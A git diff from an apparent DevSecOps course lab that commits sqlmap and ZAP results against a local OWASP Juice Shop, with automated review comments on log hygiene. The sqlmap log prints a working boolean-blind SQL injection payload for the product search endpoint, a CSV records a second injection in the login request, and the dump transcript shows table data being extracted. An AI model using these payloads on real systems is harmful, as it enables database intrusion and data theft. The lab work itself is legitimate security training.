+[12:08:03] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:08:03] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:08:03] [INFO] retrieving the length of query output
+
+[12:08:03] [INFO] retrieved: 74
+[12:08:04] [INFO] retrieved: __________________________________
+[12:08:04] [INFO] retrieved:
+[12:08:14] [INFO] retrieved: ..cefully nor consistently handled.
+[12:08:14] [INFO] retrieved: Provoke an error that is neither very gracefully nor consistently handled.
+[12:08:14] [INFO] retrieving the length of query output
+
+[12:08:14] [INFO] retrieved: 1
+
+[12:08:14] [INFO] retrieved: 1
+[12:08:14] [INFO] retrieving the length of query output
+
+[12:08:14] [INFO] retrieved:
+
+[12:08:14] [INFO] retrieved:
+[12:08:15] [INFO] retrieving the length of query output
+
+[12:08:15] [INFO] retrieved: 1
+
+[12:08:15] [INFO] retrieved: 0
+[12:08:15] [INFO] retrieving the length of query output
+
+[12:08:15] [INFO] retrieved: 2
+[12:08:15] [INFO] retrieved: __
+[12:08:15] [INFO] retrieved:
+[12:08:15] [INFO] retrieved: 26
+[12:08:15] [INFO] retrieved: 26
+[12:08:15] [INFO] retrieving the length of query output
+
+[12:08:15] [INFO] retrieved: 22
+[12:08:15] [INFO] retrieved: ______________________
+[12:08:15] [INFO] retrieved:
+[12:08:18] [INFO] retrieved: errorHandlingChallenge
+[12:08:18] [INFO] retrieved: errorHandlingChallenge
+[12:08:18] [INFO] retrieving the length of query output
+
+[12:08:18] [INFO] retrieved: 78
+[12:08:18] [INFO] retrieved: __________________________________
+[12:08:18] [INFO] retrieved:
+[12:08:26] [INFO] retrieved: ..s/Error_Handling_Cheat_Sheet.html
+[12:08:26] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html
+[12:08:26] [INFO] retrieving the length of query output
+
+[12:08:26] [INFO] retrieved: 14
+[12:08:26] [INFO] retrieved: ______________
+[12:08:26] [INFO] retrieved:
+[12:08:27] [INFO] retrieved: Error Handling
+[12:08:28] [INFO] retrieved: Error Handling
+[12:08:28] [INFO] retrieving the length of query output
+
+[12:08:28] [INFO] retrieved: 1
+
+[12:08:28] [INFO] retrieved: 1
+[12:08:28] [INFO] retrieving the length of query output
+
+[12:08:28] [INFO] retrieved: 12
+[12:08:28] [INFO] retrieved: ____________
+[12:08:28] [INFO] retrieved:
+[12:08:29] [INFO] retrieved: Prerequisite
+[12:08:29] [INFO] retrieved: Prerequisite
+[12:08:29] [INFO] retrieving the length of query output
+
+[12:08:29] [INFO] retrieved:
+
+[12:08:29] [INFO] retrieved:
+[12:08:30] [INFO] retrieving the length of query output
+
+[12:08:30] [INFO] retrieved: 30
+[12:08:30] [INFO] retrieved: ______________________________
+[12:08:30] [INFO] retrieved:
+[12:08:33] [INFO] retrieved: 2026-05-08 08:35:58.970 +00:00
+[12:08:33] [INFO] retrieved: 2026-05-08 08:35:58.970 +00:00
+[12:08:33] [INFO] retrieving the length of query output
+
+[12:08:33] [INFO] retrieved: 25
+[12:08:33] [INFO] retrieved: _________________________
+[12:08:33] [INFO] retrieved:
+[12:08:36] [INFO] retrieved: Improper Input Validation
+[12:08:36] [INFO] retrieved: Improper Input Validation
+[12:08:36] [INFO] retrieving the length of query output
+
+[12:08:36] [INFO] retrieved: 1
+
+[12:08:36] [INFO] retrieved: 0
+[12:08:36] [INFO] retrieving the length of query output
+
+[12:08:36] [INFO] retrieved: 30
+[12:08:36] [INFO] retrieved: ______________________________
+[12:08:36] [INFO] retrieved:
+[12:08:40] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00
+[12:08:40] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00
+[12:08:40] [INFO] retrieving the length of query output
+
+[12:08:40] [INFO] retrieved: 52
+[12:08:40] [INFO] retrieved: __________________________________
+[12:08:40] [INFO] retrieved:
+[12:08:45] [INFO] retrieved: .. an expired campaign coupon code.
+[12:08:45] [INFO] retrieved: Successfully redeem an expired campaign coupon code.
+[12:08:45] [INFO] retrieving the length of query output
+
+[12:08:45] [INFO] retrieved: 1
+
+[12:08:45] [INFO] retrieved: 4
+[12:08:46] [INFO] retrieving the length of query output
+
+[12:08:46] [INFO] retrieved:
+
+[12:08:46] [INFO] retrieved:
+[12:08:46] [INFO] retrieving the length of query output
+
+[12:08:46] [INFO] retrieved: 1
+
+[12:08:46] [INFO] retrieved: 0
+[12:08:46] [INFO] retrieving the length of query output
+
+[12:08:46] [INFO] retrieved: 2
+[12:08:46] [INFO] retrieved: __
+[12:08:46] [INFO] retrieved:
+[12:08:46] [INFO] retrieved: 27
+[12:08:46] [INFO] retrieved: 27
+[12:08:46] [INFO] retrieving the length of query output
+
+[12:08:46] [INFO] retrieved: 24
+[12:08:47] [INFO] retrieved: ________________________
+[12:08:47] [INFO] retrieved:
+[12:08:49] [INFO] retrieved: manipulateClockChallenge
+[12:08:49] [INFO] retrieved: manipulateClockChallenge
+[12:08:49] [INFO] retrieving the length of query output
+
+[12:08:49] [INFO] retrieved:
+
+[12:08:49] [INFO] retrieved:
+[12:08:49] [INFO] retrieving the length of query output
+
+[12:08:49] [INFO] retrieved: 14
+[12:08:49] [INFO] retrieved: ______________
+[12:08:49] [INFO] retrieved:
+[12:08:51] [INFO] retrieved: Expired Coupon
+[12:08:51] [INFO] retrieved: Expired Coupon
+[12:08:51] [INFO] retrieving the length of query output
+
+[12:08:51] [INFO] retrieved: 1
+
+[12:08:51] [INFO] retrieved: 0
+[12:08:51] [INFO] retrieving the length of query output
+
+[12:08:51] [INFO] retrieved:
+
+[12:08:51] [INFO] retrieved:
+[12:08:52] [INFO] retrieving the length of query output
+
+[12:08:52] [INFO] retrieved:
+
+[12:08:52] [INFO] retrieved:
+[12:08:52] [INFO] retrieving the length of query output
+
+[12:08:52] [INFO] retrieved: 30
+[12:08:52] [INFO] retrieved: ______________________________
+[12:08:52] [INFO] retrieved:
+[12:08:55] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00
+[12:08:56] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00
+[12:08:56] [INFO] retrieving the length of query output
+
+[12:08:56] [INFO] retrieved: 22
+[12:08:56] [INFO] retrieved: ______________________
+[12:08:56] [INFO] retrieved:
+[12:08:59] [INFO] retrieved: Broken Anti Automation
+[12:08:59] [INFO] retrieved: Broken Anti Automation
+[12:08:59] [INFO] retrieving the length of query output
+
+[12:08:59] [INFO] retrieved: 1
+
+[12:08:59] [INFO] retrieved: 0
+[12:08:59] [INFO] retrieving the length of query output
+
+[12:08:59] [INFO] retrieved: 30
+[12:08:59] [INFO] retrieved: ______________________________
+[12:08:59] [INFO] retrieved:
+[12:09:07] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00
+[12:09:07] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00
+[12:09:07] [INFO] retrieving the length of query output
+
+[12:09:07] [INFO] retrieved: 90
+[12:09:07] [INFO] retrieved: __________________________________
+[12:09:07] [INFO] retrieved: [?1l>
\ No newline at end of file
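Review bot: the dump log ends on a bare terminal control sequence (`[?1l>`) with no trailing newline, and the whole file is an interactive transcript in which every blind-retrieved value is printed twice (a partial `..d for Demos,With Coding Challenge` followed by the full `Good for Demos,With Coding Challenge`), so most of its length is progress output rather than results. The artifact worth committing is the table dump sqlmap writes into its own dump directory under the output directory set at the start of the run; if the transcript is kept as well, capture it with `--batch` and `--disable-coloring` so escape sequences and prompts do not end up in the repository.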
diff --git a/labs/lab5/sqlmap/results-05082026_1141am.csv b/labs/lab5/sqlmap/results-05082026_1141am.csv
new file mode 100644
index 00000000..3f9bd534
--- /dev/null
+++ b/labs/lab5/sqlmap/results-05082026_1141am.csv
@@ -0,0 +1,2 @@
+Target URL,Place,Parameter,Technique(s),Note(s)
+http://localhost:3000/rest/products/search?q=,URI,#1*,B,
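Review bot: this machine-generated results file is not readable on its own: `B` in the `Technique(s)` column is sqlmap's single-letter code for boolean-based blind, and `#1*` in the `Parameter` column refers to the custom injection marker placed in the URL (the `q` query string), not to a named parameter. A short legend in the lab README, or a pointer to `search-scan.log`, which records the same finding with its payload and request count, would make clear what the row means.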
diff --git a/labs/lab5/sqlmap/results-05082026_1148am.csv b/labs/lab5/sqlmap/results-05082026_1148am.csv
new file mode 100644
index 00000000..10ae6874
--- /dev/null
+++ b/labs/lab5/sqlmap/results-05082026_1148am.csv
@@ -0,0 +1,2 @@
+Target URL,Place,Parameter,Technique(s),Note(s)
+http://localhost:3000/rest/user/login,(custom) POST,JSON #1*,B,
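Review bot: this CSV records a second run at 11:48 against `http://localhost:3000/rest/user/login` with a marker in the POST JSON body (`JSON #1*`, technique `B`), but unlike the 11:41 run there is no matching scan log for it in this part of the diff. The log for the login scan should be committed next to the CSV so the finding (boolean-based blind injection in the login request body) can be verified; the CSV alone carries neither the payload nor the request count.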
diff --git a/labs/lab5/sqlmap/search-scan.log b/labs/lab5/sqlmap/search-scan.log
new file mode 100644
index 00000000..cc4a6843
--- /dev/null
+++ b/labs/lab5/sqlmap/search-scan.log
@@ -0,0 +1,53 @@
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.8.4#stable}
+|_ -| . [)] | .'| . |
+|___|_ [']_|_|_|__,| _|
+ |_|V... |_| https://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 11:41:48 /2026-05-08/
+
+[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t
[?1l>[11:41:48] [WARNING] using '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap' as the output directory
+[1/1] URL:
+GET http://localhost:3000/rest/products/search?q=*
+do you want to test this URL? [Y/n/q]
+> Y
+[11:41:48] [INFO] testing URL 'http://localhost:3000/rest/products/search?q=*'
+custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
+[11:41:48] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
+[11:41:48] [INFO] using '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap/results-05082026_1141am.csv' as the CSV results file in multiple targets mode
+[11:41:48] [INFO] testing connection to the target URL
+[11:41:48] [INFO] checking if the target is protected by some kind of WAF/IPS
+[11:41:49] [INFO] testing if the target URL content is stable
+[11:41:49] [INFO] target URL content is stable
+[11:41:49] [INFO] testing if URI parameter '#1*' is dynamic
+[11:41:49] [INFO] URI parameter '#1*' appears to be dynamic
+[11:41:49] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
+[11:41:49] [INFO] testing for SQL injection on URI parameter '#1*'
+[11:41:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+[11:41:49] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="The")
+[11:41:49] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
+[11:41:50] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
+URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
+---
+Parameter: #1* (URI)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: http://localhost:3000/rest/products/search?q=') AND 6621=6621 AND ('qNtz' LIKE 'qNtz
+---
+do you want to exploit this SQL injection? [Y/n] Y
+[11:41:50] [INFO] testing SQLite
+[11:41:50] [INFO] confirming SQLite
+[11:41:50] [INFO] actively fingerprinting SQLite
+[11:41:50] [INFO] the back-end DBMS is SQLite
+back-end DBMS: SQLite
+[11:41:50] [WARNING] HTTP error codes detected during run:
+500 (Internal Server Error) - 10 times
+[11:41:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap/results-05082026_1141am.csv'
+[11:41:50] [WARNING] your sqlmap version is outdated
+
+[*] ending @ 11:41:50 /2026-05-08/
+
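Review bot: the captured sqlmap session contains raw terminal control sequences (the `[?1049h...` and `[?1l>` bytes around the "using ... as the output directory" line), which have swallowed the `+` prefix of the following diff line and will render as garbage in any viewer; capture the run non-interactively (sqlmap's `--batch` answers the prompts shown here automatically) and redirect stdout to the file instead of copying from a terminal, or pass the log through an ANSI-stripping filter before committing. The log also embeds the absolute home path `/home/nodo/DevSecOps/...` and a timestamped `results-05082026_1141am.csv` path that exist on one machine only; `--output-dir` with a relative path inside the lab folder keeps the artifact reproducible. The run ends with "your sqlmap version is outdated" and 10 HTTP 500 responses from the target, so pin the sqlmap version in the lab notes next to the finding that matters here (boolean-based blind injection in the `q` parameter of `/rest/products/search`, back-end SQLite), otherwise a later rerun with a different version may not reproduce the same detection.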
diff --git a/labs/lab5/zap/admin-application-configuration.json b/labs/lab5/zap/admin-application-configuration.json
new file mode 100644
index 00000000..2b566e94
--- /dev/null
+++ b/labs/lab5/zap/admin-application-configuration.json
@@ -0,0 +1 @@
+{"config":{"server":{"port":3000,"basePath":"","baseUrl":"http://localhost:3000"},"application":{"domain":"juice-sh.op","name":"OWASP Juice Shop","logo":"JuiceShop_Logo.png","favicon":"favicon_js.ico","theme":"bluegrey-lightgreen","showVersionNumber":true,"showGitHubLinks":true,"localBackupEnabled":true,"numberOfRandomFakeUsers":0,"altcoinName":"Juicycoin","privacyContactEmail":"donotreply@owasp-juice.shop","customMetricsPrefix":"juiceshop","chatBot":{"name":"Juicy","greeting":"Nice to meet you https://owasp-juice.shop
"},"cookieConsent":{"message":"This website uses fruit cookies to ensure you get the juiciest tracking experience.","dismissText":"Me want it!","linkText":"But me wait!","linkUrl":"https://www.youtube.com/watch?v=9PnbKL3wuH4"},"securityTxt":{"contact":"mailto:donotreply@owasp-juice.shop","encryption":"https://keybase.io/bkimminich/pgp_keys.asc?fingerprint=19c01cb7157e4645e9e2c863062a85a8cbfbdcda","acknowledgements":"/#/score-board","hiring":"/#/jobs","csaf":"/.well-known/csaf/provider-metadata.json"},"promotion":{"video":"owasp_promo.mp4","subtitles":"owasp_promo.vtt"},"easterEggPlanet":{"name":"Orangeuze","overlayMap":"orangemap2k.jpg"},"googleOauth":{"clientId":"1005568560502-6hm16lef8oh46hr2d98vf2ohlnj4nfhq.apps.googleusercontent.com","authorizedRedirects":[{"uri":"https://demo.owasp-juice.shop"},{"uri":"https://juice-shop.herokuapp.com"},{"uri":"https://preview.owasp-juice.shop"},{"uri":"https://juice-shop-staging.herokuapp.com"},{"uri":"https://juice-shop.wtf"},{"uri":"http://localhost:3000","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://127.0.0.1:3000","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://localhost:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://127.0.0.1:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://192.168.99.100:3000","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://192.168.99.100:4200","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:3000","proxy":"https://localchromeos.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:4200","proxy":"https://localchromeos.owasp-juice.shop"}]}},"challenges":{"showSolvedNotifications":true,"showHints":true,"showMitigations":true,"codingChallengesEnabled":"solved","restrictToTutorialsFirst":false,"overwriteUrlForProductTamperingChallenge":"https://owasp.slack.com","xssBonusPayload":"","safetyMode":"auto","showFeedbackButtons":true,"csafHashValue":"7e7ce7c65db3bf0625fcea4573d25cff41f2f7e3474
f2c74334b14fc65bb4fd26af802ad17a3a03bf0eee6827a00fb8f7905f338c31b5e6ea9cb31620242e843","metricsIgnoredUserAgents":["Prometheus","Alloy","promscrape","otelcol"]},"hackingInstructor":{"isEnabled":true,"avatarImage":"JuicyBot.png","hintPlaybackSpeed":"normal"},"products":[{"name":"Apple Juice (1000ml)","price":1.99,"deluxePrice":0.99,"limitPerUser":5,"description":"The all-time classic.","image":"apple_juice.jpg","reviews":[{"text":"One of my favorites!","author":"admin"}]},{"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg","reviews":[{"text":"y0ur f1r3wall needs m0r3 musc13","author":"uvogin"}]},{"name":"Eggfruit Juice (500ml)","description":"Now with even more exotic flavour.","price":8.99,"image":"eggfruit_juice.jpg","reviews":[{"text":"I bought it, would buy again. 5/7","author":"admin"}]},{"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"image":"raspberry_juice.jpg"},{"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.","price":2.99,"deluxePrice":1.99,"limitPerUser":5,"image":"lemon_juice.jpg"},{"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","reviews":[{"text":"Fry liked it too.","author":"bender"}]},{"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"limitPerUser":5,"image":"fan_shirt.jpg"},{"name":"OWASP Juice Shop CTF Girlie-Shirt","description":"For serious Capture-the-Flag heroines only!","price":22.49,"image":"fan_girlie.jpg"},{"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connection according given list of ciphers and various SSL 
configurations.","price":0.01,"image":"orange_juice.jpg","urlForProductTamperingChallenge":"https://www.owasp.org/index.php/O-Saft"},{"name":"Christmas Super-Surprise-Box (2014 Edition)","description":"Contains a random selection of 10 bottles (each 500ml) of our tastiest juices and an extra fan shirt for an unbeatable price!","price":29.99,"image":"undefined.jpg","useForChristmasSpecialChallenge":true},{"name":"Rippertuer Special Juice","description":"Contains a magical collection of the rarest fruits gathered from all around the world, like Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos... and others, at an unbelievable price!
This item has been made unavailable because of lack of safety standards.","price":16.99,"image":"undefined.jpg","keywordsForPastebinDataLeakChallenge":["hueteroneel","eurogium edule"]},{"name":"OWASP Juice Shop Sticker (2015/2016 design)","description":"Die-cut sticker with the official 2015/2016 logo. By now this is a rare collectors item. Out of stock!","price":999.99,"image":"sticker.png","deletedDate":"2017-04-28"},{"name":"OWASP Juice Shop Iron-Ons (16pcs)","description":"Upgrade your clothes with washer safe iron-ons of the OWASP Juice Shop or CTF Extension logo!","price":14.99,"image":"iron-on.jpg"},{"name":"OWASP Juice Shop Magnets (16pcs)","description":"Your fridge will be even cooler with these OWASP Juice Shop or CTF Extension logo magnets!","price":15.99,"image":"magnets.jpg"},{"name":"OWASP Juice Shop Sticker Page","description":"Massive decoration opportunities with these OWASP Juice Shop or CTF Extension sticker pages! Each page has 16 stickers on it.","price":9.99,"image":"sticker_page.jpg"},{"name":"OWASP Juice Shop Sticker Single","description":"Super high-quality vinyl sticker single with the OWASP Juice Shop or CTF Extension logo! The ultimate laptop decal!","price":4.99,"image":"sticker_single.jpg"},{"name":"OWASP Juice Shop Temporary Tattoos (16pcs)","description":"Get one of these temporary tattoos to proudly wear the OWASP Juice Shop or CTF Extension logo on your skin! If you tweet a photo of yourself with the tattoo, you get a couple of our stickers for free! Please mention @owasp_juiceshop in your tweet!","price":14.99,"image":"tattoo.jpg","reviews":[{"text":"I straight-up gots nuff props fo'these tattoos!","author":"rapper"}]},{"name":"OWASP Juice Shop Mug","description":"Black mug with regular logo on one side and CTF logo on the other! Your colleagues will envy you!","price":21.99,"image":"fan_mug.jpg"},{"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. 
And with logo.","price":49.99,"image":"fan_hoodie.jpg"},{"name":"OWASP Juice Shop-CTF Velcro Patch","description":"4x3.5\" embroidered patch with velcro backside. The ultimate decal for every tactical bag or backpack!","price":2.92,"quantity":5,"limitPerUser":5,"image":"velcro-patch.jpg","reviews":[{"text":"This thang would look phat on Bobby's jacked fur coat!","author":"rapper"},{"text":"Looks so much better on my uniform than the boring Starfleet symbol.","author":"jim"}]},{"name":"Woodruff Syrup \"Forest Master X-Treme\"","description":"Harvested and manufactured in the Black Forest, Germany. Can cause hyperactive behavior in children. Can cause permanent green tongue when consumed undiluted.","price":6.99,"image":"woodruff_syrup.jpg"},{"name":"Green Smoothie","description":"Looks poisonous but is actually very good for your health! Made from green cabbage, spinach, kiwi and grass.","price":1.99,"image":"green_smoothie.jpg","reviews":[{"text":"Fresh out of a replicator.","author":"jim"}]},{"name":"Quince Juice (1000ml)","description":"Juice of the Cydonia oblonga fruit. Not exactly sweet but rich in Vitamin C.","price":4.99,"image":"quince.jpg"},{"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be sent back to us for recycling.","price":0.89,"limitPerUser":5,"image":"apple_pressings.jpg"},{"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg"},{"name":"OWASP Juice Shop Logo (3D-printed)","description":"This rare item was designed and handcrafted in Sweden. 
This is why it is so incredibly expensive despite its complete lack of purpose.","price":99.99,"image":"3d_keychain.jpg","fileForRetrieveBlueprintChallenge":"JuiceShop.stl","exifForBlueprintChallenge":["OpenSCAD"]},{"name":"Juice Shop Artwork","description":"Unique masterpiece painted with different kinds of juice on 90g/m² lined paper.","price":278.74,"quantity":0,"image":"artwork.jpg","deletedDate":"2020-12-24"},{"name":"Global OWASP WASPY Award 2017 Nomination","description":"Your chance to nominate up to three quiet pillars of the OWASP community ends 2017-06-30! Nominate now!","price":0.03,"image":"waspy.png","deletedDate":"2017-07-01"},{"name":"Strawberry Juice (500ml)","description":"Sweet & tasty!","price":3.99,"image":"strawberry_juice.jpeg"},{"name":"Carrot Juice (1000ml)","description":"As the old German saying goes: \"Carrots are good for the eyes. Or has anyone ever seen a rabbit with glasses?\"","price":2.99,"image":"carrot_juice.jpeg","reviews":[{"text":"0 st4rs f0r 7h3 h0rr1bl3 s3cur17y","author":"uvogin"}]},{"name":"OWASP Juice Shop Sweden Tour 2017 Sticker Sheet (Special Edition)","description":"10 sheets of Sweden-themed stickers with 15 stickers on each.","price":19.1,"image":"stickersheet_se.png","deletedDate":"2017-09-20"},{"name":"Pwning OWASP Juice Shop","description":"The official Companion Guide by Björn Kimminich available for free on LeanPub and also readable online!","price":5.99,"image":"cover_small.jpg","reviews":[{"text":"Even more interesting than watching Interdimensional Cable!","author":"morty"}]},{"name":"Melon Bike (Comeback-Product 2018 Edition)","description":"The wheels of this bicycle are made from real water melons. 
You might not want to ride it up/down the curb too hard.","price":2999,"quantity":3,"limitPerUser":1,"image":"melon_bike.jpeg"},{"name":"OWASP Juice Shop Coaster (10pcs)","description":"Our 95mm circle coasters are printed in full color and made from thick, premium coaster board.","price":19.99,"quantity":0,"image":"coaster.jpg"},{"name":"OWASP Snakes and Ladders - Web Applications","description":"This amazing web application security awareness board game is available for Tabletop Simulator on Steam Workshop now!","price":0.01,"quantity":8,"image":"snakes_ladders.jpg","reviews":[{"text":"Wait for a 10$ Steam sale of Tabletop Simulator!","author":"bjoernOwasp"}]},{"name":"OWASP Snakes and Ladders - Mobile Apps","description":"This amazing mobile app security awareness board game is available for Tabletop Simulator on Steam Workshop now!","price":0.01,"quantity":0,"image":"snakes_ladders_m.jpg","reviews":[{"text":"Here yo' learn how tha fuck ta not show yo' goddamn phone on camera!","author":"rapper"}]},{"name":"OWASP Juice Shop Holographic Sticker","description":"Die-cut holographic sticker. 
Stand out from those 08/15-sticker-covered laptops with this shiny beacon of 80's coolness!","price":2,"quantity":0,"image":"holo_sticker.png","reviews":[{"text":"Rad, dude!","author":"rapper"},{"text":"Looks spacy on Bones' new tricorder!","author":"jim"},{"text":"Will put one on the Planet Express ship's bumper!","author":"bender"}]},{"name":"OWASP Juice Shop \"King of the Hill\" Facemask","description":"Facemask with compartment for filter from 50% cotton and 50% polyester.","price":13.49,"quantity":0,"limitPerUser":1,"image":"fan_facemask.jpg","reviews":[{"text":"K33p5 y0ur ju1cy 5plu773r 70 y0ur53lf!","author":"uvogin"},{"text":"Puny mask for puny human weaklings!","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Common)","description":"Common rarity \"Juice Shop\" card for the Adversary Trading Cards CCG.","price":2.99,"deluxePrice":0.99,"deletedDate":"2020-11-30","limitPerUser":5,"image":"ccg_common.png","reviews":[{"text":"Ooooh, puny human playing Mau Mau, now?","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Super Rare)","description":"Super rare \"Juice Shop\" card with holographic foil-coating for the Adversary Trading Cards CCG.","price":99.99,"deluxePrice":69.99,"deletedDate":"2020-11-30","quantity":2,"limitPerUser":1,"image":"ccg_foil.png","reviews":[{"text":"Mau Mau with bling-bling? Humans are so pathetic!","author":"bender"}]},{"name":"Juice Shop \"Permafrost\" 2020 Edition","description":"Exact version of OWASP Juice Shop that was archived on 02/02/2020 by the GitHub Archive Program and ultimately went into the Arctic Code Vault on July 8. 
2020 where it will be safely stored for at least 1000 years.","price":9999.99,"quantity":1,"limitPerUser":1,"image":"permafrost.jpg","reviews":[{"text":"🧊 Let it go, let it go 🎶 Can't hold it back anymore 🎶 Let it go, let it go 🎶 Turn away and slam the door ❄️","author":"rapper"}]},{"name":"Best Juice Shop Salesman Artwork","description":"Unique digital painting depicting Stan, our most qualified and almost profitable salesman. He made a succesful carreer in selling used ships, coffins, krypts, crosses, real estate, life insurance, restaurant supplies, voodoo enhanced asbestos and courtroom souvenirs before finally adding his expertise to the Juice Shop marketing team.","price":5000,"quantity":1,"image":"artwork2.jpg","reviews":[{"text":"I'd stand on my head to make you a deal for this piece of art.","author":"stan"},{"text":"Just when my opinion of humans couldn't get any lower, along comes Stan...","author":"bender"}]},{"name":"OWASP Juice Shop Card (non-foil)","description":"Mythic rare (obviously...) card \"OWASP Juice Shop\" with three distinctly useful abilities. Alpha printing, mint condition. A true collectors piece to own!","price":1000,"quantity":3,"limitPerUser":1,"image":"card_alpha.jpg","reviews":[{"text":"DO NOT PLAY WITH THIS! Double-sleeve, then put it in the GitHub Arctic Vault for perfect preservation and boost of secondary market value!","author":"accountant"}]},{"name":"20th Anniversary Celebration Ticket","description":"Get your free 🎫 for OWASP 20th Anniversary Celebration online conference! Hear from world renowned keynotes and special speakers, network with your peers and interact with our event sponsors. With an anticipated 10k+ attendees from around the world, you will not want to miss this live on-line event!","price":1e-20,"deletedDate":"2021-09-25","limitPerUser":1,"image":"20th.jpeg","reviews":[{"text":"I'll be there! 
Will you, too?","author":"bjoernOwasp"}]},{"name":"OWASP Juice Shop LEGO™ Tower","description":"Want to host a Juice Shop CTF in style? Build your own LEGO™ tower which holds four Raspberry Pi 4 models with PoE HAT modules running a MultiJuicer Kubernetes cluster! Wire to a switch and connect to your network to have an out-of-the-box ready CTF up in no time!","price":799,"quantity":3,"limitPerUser":1,"image":"lego_case.jpg","reviews":[{"text":"Check out the /#/photo-wall for some impressions of the assembly process!","author":"bjoernOwasp"}]},{"name":"DSOMM & Juice Shop User Day Ticket","description":"You are going to the OWASP Global AppSec San Francisco 2024? Get a ticket* for this amazing side event as well! Check the juice-packed agenda here for all the details!
*=scroll down to Elevate: DSOMM and Juice Shop User Day (Sept. 25) after clicking Get Tickets on Eventbrite. Ticket price set to only covers fees for room, AV, and catering throughout the day.","price":55.2,"deletedDate":"2024-09-26","limitPerUser":1,"image":"user_day_ticket.png","reviews":[{"text":"This is *THE* chance to \"meet the makers\" of both Juice Shop and DSOMM in the United States!","author":"bjoernOwasp"},{"text":"The DSOMM Live Assessment session will even use Juice Shop as its \"real-world\" example!","author":"timo"},{"text":"We will showcase the amazing MultiJuicer Lego Tower at this event!","author":"jannik"}]}],"memories":[{"image":"magn(et)ificent!-1571814229653.jpg","caption":"Magn(et)ificent!","user":"bjoernGoogle"},{"image":"my-rare-collectors-item!-[̲̅$̲̅(̲̅-͡°-͜ʖ-͡°̲̅)̲̅$̲̅]-1572603645543.jpg","caption":"My rare collectors item! [̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]","user":"bjoernGoogle"},{"image":"favorite-hiking-place.png","caption":"I love going hiking here...","geoStalkingMetaSecurityQuestion":14,"geoStalkingMetaSecurityAnswer":"Daniel Boone National Forest"},{"image":"IMG_4253.jpg","caption":"My old workplace...","geoStalkingVisualSecurityQuestion":10,"geoStalkingVisualSecurityAnswer":"ITsec"},{"image":"BeeHaven.png","caption":"Welcome to the Bee Haven (/#/bee-haven)🐝","user":"evm"},{"image":"sorted-the-pieces,-starting-assembly-process-1721152307290.jpg","caption":"Sorted the pieces, starting assembly process...","user":"bjoernOwasp"},{"image":"building-something-literally-bottom-up-1721152342603.jpg","caption":"Building something literally bottom up...","user":"bjoernOwasp"},{"image":"putting-in-the-hardware-1721152366854.jpg","caption":"Putting in the hardware...","user":"bjoernOwasp"},{"image":"everything-up-and-running!-1721152385146.jpg","caption":"Everything up and running!","user":"bjoernOwasp"}],"ctf":{"showFlagsInNotifications":false,"showCountryDetailsInNotifications":"none","countryMapping":null}}}
\ No newline at end of file
